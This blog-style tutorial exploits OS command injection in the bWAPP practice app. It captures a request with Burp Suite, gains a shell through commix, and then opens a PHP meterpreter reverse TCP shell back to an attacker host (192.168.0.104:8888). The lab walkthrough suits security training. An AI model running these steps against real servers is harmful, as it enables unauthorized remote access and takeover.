Command Injection to Meterpreter using Commix

In this article I will show how easily you can hack a web server using commix tool if the severe is suffering from OS command injection vulnerbility and try to access meterpreter shell.

Attaker: kali Linux
Target: bwapp
Download it from here and install and run it with VM ware.


Being an attacker browser target IP in browse:192.168.0.105/bwapp, now Login with bee:bug as credential and select OS command injection from choose your bug; then click on hack.


Here requested web page gets open where you can execute any command. Now I will start burp suite to capture the request. In order to start intercept click the proxy tab and turn on intercept; don’t forget to run proxy inside the browser. Now give any command like IP: 192.168.0.105 and click on lookup.


Inside burp suite you will get the post request has been captured. Here we have victim’s details which will be helpful for making an attack on its web server. Now select the whole data from POST……. &form=submit then copied it and saved in a text file. I had saved it as os.txt and further use it with commix.


In previous tutorial we had used manual step inside commix to execute the given command for making attack but here the step is more easy and convenience to apply for making an attack. Now Type following command for commix to start attack.

Commix –r /root/Desktop/os.txt

Hit enter or press Y as reply of every question. From given screenshot you can see I have got the victim’s shell and here I had executed following command to retrieve victim’s detail.

Whoami


Now start reverse tcp connection using below steps.
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.0.104
commix(reverse_tcp) > set LPORT 8888
 Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.
commix(reverse_tcp) > 2
Option asks by commix to set target Type ‘5’ to use php meterpreter reverse tcp shell.
 commix(reverse_tcp) >5


Copy the highlighted text and paste it on anther terminal which will load metasploit framework and start multi handler automatically at background.


Once the metasploit get loaded then move back to previous terminal where commix is running hit enter here.


From given screenshot you can see I have got meterpreter shell.
Meterpreter>sysinfo

0 comments:

Post a Comment